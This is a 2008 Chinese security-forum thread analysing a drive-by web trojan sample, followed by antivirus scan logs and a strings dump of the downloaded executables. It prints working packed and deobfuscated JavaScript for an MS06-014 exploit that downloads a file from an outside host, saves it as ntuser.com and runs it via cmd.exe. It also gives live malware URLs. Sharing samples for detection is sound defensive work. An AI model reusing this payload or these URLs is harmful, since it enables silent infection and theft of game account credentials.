挂马

显示全部楼层 · 发表于 2008-4-26 00:26:25

显示全部楼层 · 发表于 2008-4-26 00:37:12

http://user1.33212.net/ms06014.js

显示全部楼层 · 发表于 2008-4-26 00:52:36

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('F{i 9=q.E("\\m\\f\\a\\p\\h\\8\\h\\D\\4\\7\\C\\m\\G\\H\\w\\w\\B","");9.J("I","\\j\\4\\4\\g\\L\\l\\l\\s\\8\\3\\p\\d\\7\\v\\v\\x\\d\\x\\7\\n\\3\\4\\l\\A\\o\\z\\7\\a\\8\\8",0);9.y();6.K=1;6.r();6.Y(9.X);k="..\\\\W.10";6.Z(k,2);6.11();i t=q.M("\\u\\j\\3\\5\\5\\7\\V\\g\\g\\5\\f\\a\\o\\4\\f\\h\\n","");i U="\\b\\P\\b\\O\\d\\b";t["\\u\\j\\3\\5\\5\\N\\Q\\3\\a\\s\\4\\3"]("R.T","/c "+k,"","r",0)}S(e){}',62,64,'|||x65|x74|x6c|as|x2e|x73|xml|x63|x30||x31||x69|x70|x6f|var|x68|path|x2f|x4d|x6e|x61|x72|ado|open|x75|shell|x53|x33|x54|x32|Send|x6b|x62|x50|x58|x66|CreateObject|try|x4c|x48|GET|Open|type|x3a|createobject|x45|x34|x38|x78|cmd|catch|exe|Kaspersky|x41|ntuser|responseBody|write|savetofile|com|close'.split('|'),0,{}))

显示全部楼层 · 发表于 2008-4-26 00:53:59

try{var xml=ado.CreateObject("Microsoft.XMLHTTP","");xml.Open("GET","http://user1.33212.net/bak.css",0);xml.Send();as.type=1;as.open();as.write(xml.responseBody);path="..\\ntuser.com";as.savetofile(path,2);as.close();var shell=ado.createobject("Shell.Application","");var Kaspersky="080410";shell["ShellExecute"]("cmd.exe","/c "+path,"","open",0)}catch(e){}

http://user1.33212.net/bak.css

显示全部楼层 · 发表于 2008-4-26 05:25:23

Starting the file scan:

Begin scan in 'E:\AV\bak.css'
E:\AV\bak.css
[DETECTION] Is the Trojan horse TR/Dldr.Agent.wtb.1
[NOTE] The file was deleted!

显示全部楼层 · 发表于 2008-4-26 05:42:42

TO KL

显示全部楼层 · 发表于 2008-4-26 08:16:26

显示全部楼层 · 发表于 2008-4-26 08:19:07

全灭
Starting the file scan:

Begin scan in 'E:\AV\muma.zip'
E:\AV\muma.zip
  [0] Archive type: ZIP
--> muma/1.exe
   --> Object
      [2] Archive type: RSRC
      --> Object
         [DETECTION] Is the Trojan horse TR/PSW.OnlineGames.abtn
      --> Object
         [DETECTION] Contains detection pattern of the rootkit RKIT/Agent.aji
  --> muma/11.exe
   [DETECTION] Is the Trojan horse TR/PSW.OnlineGames.abcr
  --> muma/13.exe
   [DETECTION] Is the Trojan horse TR/PSW.OnlineGames.abtp
--> muma/16.exe
      [DETECTION] Is the Trojan horse TR/Onlinegames.NVI
--> muma/19.exe
   --> Object
      [2] Archive type: RSRC
      --> Object
         [DETECTION] Is the Trojan horse TR/PSW.OnlineGames.abxd
      --> Object
         [DETECTION] Contains detection pattern of the rootkit RKIT/Agent.aji
  --> muma/2.exe
   [DETECTION] Is the Trojan horse TR/PSW.OnlineGames.NVI.27
  --> muma/20.exe
   [DETECTION] Is the Trojan horse TR/PSW.OnlineGames.NVI.53
--> muma/25.exe
   --> Object
      [2] Archive type: RSRC
      --> Object
         [DETECTION] Is the Trojan horse TR/PSW.12377
      --> Object
         [DETECTION] Contains detection pattern of the rootkit RKIT/Agent.ahy
--> muma/26.exe
   --> Object
      [2] Archive type: RSRC
      --> Object
         [DETECTION] Contains detection pattern of the rootkit RKIT/Agent.ajp
--> muma/28.exe
   --> Object
      [2] Archive type: RSRC
      --> Object
         [DETECTION] Contains detection pattern of the rootkit RKIT/Agent.aji
--> muma/29.exe
   --> Object
      [2] Archive type: RSRC
      --> Object
      [3] Archive type: RSRC
      --> Object
            [DETECTION] Contains detection pattern of the SPR/PortScan.I program
      --> Object
            [DETECTION] Is the Trojan horse TR/Dldr.VB.dzy
      --> Object
         [DETECTION] Is the Trojan horse TR/Dldr.VB.VRF
--> muma/30.exe
   --> Object
      [2] Archive type: RSRC
      --> Object
         [DETECTION] Is the Trojan horse TR/Dldr.Agent.mzm
--> muma/7.exe
   --> Object
      [2] Archive type: RSRC
      --> Object
         [DETECTION] Is the Trojan horse TR/PSW.OnlineGames.abxk
      --> Object
         [DETECTION] Contains detection pattern of the rootkit RKIT/Agent.aji
--> muma/8.exe
   --> Object
      [2] Archive type: RSRC
      --> Object
         [DETECTION] Is the Trojan horse TR/PSW.Steal.44658
  --> muma/bak.css
   [DETECTION] Is the Trojan horse TR/Dldr.Agent.wtb.1
   [NOTE]    The file was deleted!

End of the scan: 2008年4月26日  08:20
Used time: 00:23 min

The scan has been done completely.

   0 Scanning directories
   33 Files were scanned
   38 viruses and/or unwanted programs were found
   2 Files were classified as suspicious:
   1 files were deleted
   0 files were repaired
   0 files were moved to quarantine
   0 files were renamed
   0 Files cannot be scanned
   -5 Files not concerned
   1 Archives were scanned
   0 Warnings
   1 Notes

[ 本帖最后由 Exia 于 2008-4-26 08:28 编辑 ]

显示全部楼层 · 发表于 2008-4-26 08:41:31

小红伞漏了31.exe

卡巴只剩下31.exe，TO KL

显示全部楼层 · 发表于 2008-4-26 08:43:53

MD5: 741431E8F7763251A383546697CFFC46
Upack V0.37 -> Dwing

00017A64 00417A64    0 \Registry\Machine\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}\
00017B28 00417B28    0 \Linkage
0001912A 0041912A    0 \BaseNamedObjects\NPF0000000000
0001DFC8 0041DFC8    0 \Registry\Machine\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}
0001E088 0041E088    0 \Registry\Machine\System\CurrentControlSet\Services\Tcpip\Linkage
0001E10C 0041E10C    0 \DosDevices\
0001E128 0041E128    0 \Device\
0002C530 0042C530    0 SYSTEM\CurrentControlSet\Services
0002C574 0042C574    0 SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces
0002C62C 0042C62C    0 SYSTEM\CurrentControlSet\Services\Tcpip\Linkage
0002C6C4 0042C6C4    0 SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}
0002C7AD 0042C7AD    0 system32\drivers\npf.sys
0002C7E0 0042C7E0    0 SYSTEM\CurrentControlSet\Services\NPF

[病毒样本] 挂马

FireFox脚本解析结果

下载的31只马 + bak.css

本帖子中包含更多资源

回复 7楼 yimike 的帖子

31.exe